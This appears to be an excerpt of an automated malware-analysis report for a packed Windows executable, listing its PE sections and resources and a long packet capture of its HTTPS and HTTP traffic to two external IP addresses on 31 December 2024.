vnoaippe  0xae6000         0x1c1000      0x1c0400  8a8541b0307faec83e262055eaccade0  False     0.9941880097950363  data                  7.955338665560642   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ernybvwg  0xca7000         0x1000        0x400     5957c67cc2beb11cc524c1903195a9b5  False     0.7939453125        data                  6.1828777064826985  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  0xca8000         0x3000        0x2200    a48e4e0fca11617b98f962196e32e12d  False     0.0764016544117647  DOS executable (COM)  0.8028200000768048  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name         RVA       Size   Type                                    Language  Country  ZLIB Complexity
RT_MANIFEST  0xca6000  0x256  ASCII text, with CRLF line terminators                      0.5100334448160535

DLL           Import
kernel32.dll  lstrcpy

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 31, 2024 09:50:58.640675068 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:58.640719891 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:58.640779018 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:58.652610064 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:58.652633905 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:59.345777035 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:59.346406937 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:59.346452951 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:59.347954035 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:59.348031044 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:59.349534035 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:59.349611998 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:59.355377913 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:59.355405092 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:59.410371065 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:59.985479116 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:59.985600948 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:50:59.985742092 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:59.995521069 CET  49704        443        192.168.2.8      34.200.57.114
Dec 31, 2024 09:50:59.995551109 CET  443          49704      34.200.57.114    192.168.2.8
Dec 31, 2024 09:51:01.705614090 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.710417986 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.710493088 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.712446928 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.717324972 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717339993 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717360973 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717370987 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717389107 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.717407942 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.717411995 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717422962 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717442036 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.717459917 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.717475891 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.717479944 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717494965 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717546940 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717556953 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.717569113 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.717598915 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.717612028 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.722258091 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.722271919 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.722313881 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.722336054 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.722337008 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.722347021 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.722388029 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.722402096 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.722404957 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.722415924 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.722460985 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.766881943 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.767052889 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.814873934 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.815012932 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.863198042 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.863322020 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.914911032 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.914974928 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:01.963917971 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:01.963979006 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.010936975 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.011039972 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.062959909 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.063010931 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.110994101 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.111057043 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.148247004 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.148452044 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.153431892 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153444052 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153548002 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.153572083 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153583050 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153696060 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153707027 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153754950 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.153781891 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.153852940 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153862000 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153867006 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153876066 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153929949 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.153930902 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153940916 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.153978109 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.153994083 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.154032946 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154042959 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154051065 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154062033 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154103041 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154108047 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.154148102 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154254913 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154263973 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154295921 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154305935 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154372931 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154408932 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154498100 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154509068 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154551029 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154608965 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154625893 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154664993 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.154721975 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.154733896 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.154783010 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.158493042 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.158510923 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.158612013 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.158642054 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.158700943 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.158735037 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.158787966 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.158876896 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.158962965 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159059048 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159116983 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159190893 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159262896 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159379005 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159392118 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159432888 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159441948 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159529924 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159538984 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159620047 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159662008 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159775972 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159820080 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159904003 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159946918 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.159955978 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160037041 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160046101 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160120010 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160129070 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160267115 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160276890 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160284042 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.160286903 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160325050 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160356045 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.160375118 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160407066 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160567999 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160587072 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160645962 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160657883 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160686970 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160696030 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160733938 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160743952 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160816908 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160841942 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160906076 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160914898 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160947084 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.160955906 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161000967 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161010027 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161047935 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161057949 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161135912 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161149025 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161156893 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161164999 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161181927 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161190987 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161207914 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161216974 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161247969 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161256075 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161289930 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161298990 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161348104 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161356926 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161392927 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.161401987 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.163424015 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.163485050 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.163492918 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.163501978 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.163573027 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.163582087 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.163614988 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.163625002 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165100098 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165133953 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165150881 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165239096 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165247917 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165301085 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165309906 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165318012 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165396929 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165406942 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165414095 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165438890 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.165450096 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165460110 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165507078 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165515900 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165523052 CET  49705        80         192.168.2.8      91.149.241.220
Dec 31, 2024 09:51:02.165529013 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165556908 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165612936 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165621042 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165647030 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165656090 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165690899 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165702105 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165747881 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165756941 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165787935 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165796995 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165829897 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165838957 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165872097 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165880919 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165910006 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165919065 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.165934086 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166032076 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166043043 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166052103 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166060925 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166069984 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166078091 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166085958 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166109085 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166117907 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166126966 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166131020 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166213036 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166222095 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166229963 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166246891 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166254997 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166263103 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166273117 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.166285992 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170303106 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170312881 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170325041 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170334101 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170372963 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170388937 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170449018 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170458078 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170490980 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170500994 CET  80           49705      91.149.241.220   192.168.2.8
Dec 31, 2024 09:51:02.170538902 CET  80           49705      91.149.241.220   192.168.2.8
                                  Dec 31, 2024 09:51:02.170547962 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170584917 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170628071 CET4970580192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:02.170664072 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170672894 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170681953 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170712948 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170723915 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170738935 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170747042 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170788050 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170797110 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170824051 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170833111 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170871973 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170881033 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170913935 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170922995 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170969963 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170979023 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170994997 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171003103 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171041965 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171051025 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171066046 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171077967 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171092033 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171101093 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171194077 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171204090 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171211958 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171221972 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171231985 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171241045 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171257019 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171266079 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171276093 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171283960 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171299934 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171308041 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171355009 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171365023 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171374083 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175451994 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175519943 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175529957 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175569057 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175578117 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175595045 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175604105 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175661087 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175669909 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175681114 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175698042 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175781012 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175791025 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175795078 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175883055 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175894022 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175942898 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175952911 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175968885 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175977945 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176003933 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176012993 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176031113 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176040888 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176064014 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176073074 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176120043 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176129103 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176160097 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176168919 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176202059 CET804970591.149.241.220192.168.2.8
